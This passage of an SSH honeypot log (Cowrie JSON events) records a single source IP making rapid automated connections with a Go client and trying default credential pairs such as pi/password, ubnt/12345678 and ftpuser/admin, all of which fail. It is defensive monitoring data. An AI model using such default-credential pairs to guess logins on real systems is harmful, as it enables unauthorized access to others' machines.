tr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.150380Z","src_ip":"212.227.125.160","session":"5058f3e893e1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.258948Z","src_ip":"212.227.125.160","session":"4965b84e022e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.263444Z","src_ip":"212.227.125.160","session":"61ccb8764813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60152,"dst_ip":"1.2.3.4","dst_port":22,"session":"5762748d285f","protocol":"ssh","message":"New connection: 212.227.125.160:60152 (1.2.3.4:22) [session: 5762748d285f]","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.319842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.341199Z","src_ip":"212.227.125.160","session":"5762748d285f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.365023Z","src_ip":"212.227.125.160","session":"5762748d285f"}
{"eventid":"cowrie.login.failed","username":"noc","password":"noc","message":"login attempt [noc/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.431462Z","src_ip":"212.227.125.160","session":"5058f3e893e1"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.524359Z","src_ip":"212.227.125.160","session":"2e4dd72ec7f2"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.534831Z","src_ip":"212.227.125.160","session":"5762748d285f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60156,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf024c2db20","protocol":"ssh","message":"New connection: 212.227.125.160:60156 (1.2.3.4:22) [session: 2cf024c2db20]","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.565768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.566840Z","src_ip":"212.227.125.160","session":"2cf024c2db20"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.609156Z","src_ip":"212.227.125.160","session":"2cf024c2db20"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.737316Z","src_ip":"212.227.125.160","session":"2cf024c2db20"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.876737Z","src_ip":"212.227.125.160","session":"4170ffb77f1c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.307903Z","src_ip":"212.227.125.160","session":"61ccb8764813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60158,"dst_ip":"1.2.3.4","dst_port":22,"session":"10fa26d25f73","protocol":"ssh","message":"New connection: 212.227.125.160:60158 (1.2.3.4:22) [session: 10fa26d25f73]","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.349804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.351108Z","src_ip":"212.227.125.160","session":"10fa26d25f73"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.394733Z","src_ip":"212.227.125.160","session":"10fa26d25f73"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.477114Z","src_ip":"212.227.125.160","session":"5058f3e893e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60160,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d882fc57fc8","protocol":"ssh","message":"New connection: 212.227.125.160:60160 (1.2.3.4:22) [session: 7d882fc57fc8]","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.518904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.519852Z","src_ip":"212.227.125.160","session":"7d882fc57fc8"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.524634Z","src_ip":"212.227.125.160","session":"10fa26d25f73"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.562054Z","src_ip":"212.227.125.160","session":"7d882fc57fc8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.578391Z","src_ip":"212.227.125.160","session":"5762748d285f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60170,"dst_ip":"1.2.3.4","dst_port":22,"session":"a84f76c25271","protocol":"ssh","message":"New connection: 212.227.125.160:60170 (1.2.3.4:22) [session: a84f76c25271]","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.619607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.620803Z","src_ip":"212.227.125.160","session":"a84f76c25271"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.663000Z","src_ip":"212.227.125.160","session":"a84f76c25271"}
{"eventid":"cowrie.login.failed","username":"noc","password":"password","message":"login attempt [noc/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.690437Z","src_ip":"212.227.125.160","session":"7d882fc57fc8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.780871Z","src_ip":"212.227.125.160","session":"2cf024c2db20"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"12345678","message":"login attempt [ubnt/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.791410Z","src_ip":"212.227.125.160","session":"a84f76c25271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60172,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4e4bbeedd79","protocol":"ssh","message":"New connection: 212.227.125.160:60172 (1.2.3.4:22) [session: e4e4bbeedd79]","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.823646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.824497Z","src_ip":"212.227.125.160","session":"e4e4bbeedd79"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:35.867761Z","src_ip":"212.227.125.160","session":"e4e4bbeedd79"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.003253Z","src_ip":"212.227.125.160","session":"e4e4bbeedd79"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.598726Z","src_ip":"212.227.125.160","session":"10fa26d25f73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60184,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f9e001f4940","protocol":"ssh","message":"New connection: 212.227.125.160:60184 (1.2.3.4:22) [session: 7f9e001f4940]","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.646867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.685421Z","src_ip":"212.227.125.160","session":"7f9e001f4940"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.727594Z","src_ip":"212.227.125.160","session":"7f9e001f4940"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.768172Z","src_ip":"212.227.125.160","session":"7d882fc57fc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60190,"dst_ip":"1.2.3.4","dst_port":22,"session":"55cea6c29d07","protocol":"ssh","message":"New connection: 212.227.125.160:60190 (1.2.3.4:22) [session: 55cea6c29d07]","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.818180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.867961Z","src_ip":"212.227.125.160","session":"55cea6c29d07"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.868715Z","src_ip":"212.227.125.160","session":"55cea6c29d07"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.893992Z","src_ip":"212.227.125.160","session":"a84f76c25271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60202,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ee773c8c434","protocol":"ssh","message":"New connection: 212.227.125.160:60202 (1.2.3.4:22) [session: 7ee773c8c434]","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.956655Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:36.992368Z","src_ip":"212.227.125.160","session":"7f9e001f4940"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.008416Z","src_ip":"212.227.125.160","session":"7ee773c8c434"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.008939Z","src_ip":"212.227.125.160","session":"7ee773c8c434"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.089224Z","src_ip":"212.227.125.160","session":"e4e4bbeedd79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60218,"dst_ip":"1.2.3.4","dst_port":22,"session":"fffa28e096f9","protocol":"ssh","message":"New connection: 212.227.125.160:60218 (1.2.3.4:22) [session: fffa28e096f9]","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.140941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.193003Z","src_ip":"212.227.125.160","session":"fffa28e096f9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.194734Z","src_ip":"212.227.125.160","session":"fffa28e096f9"}
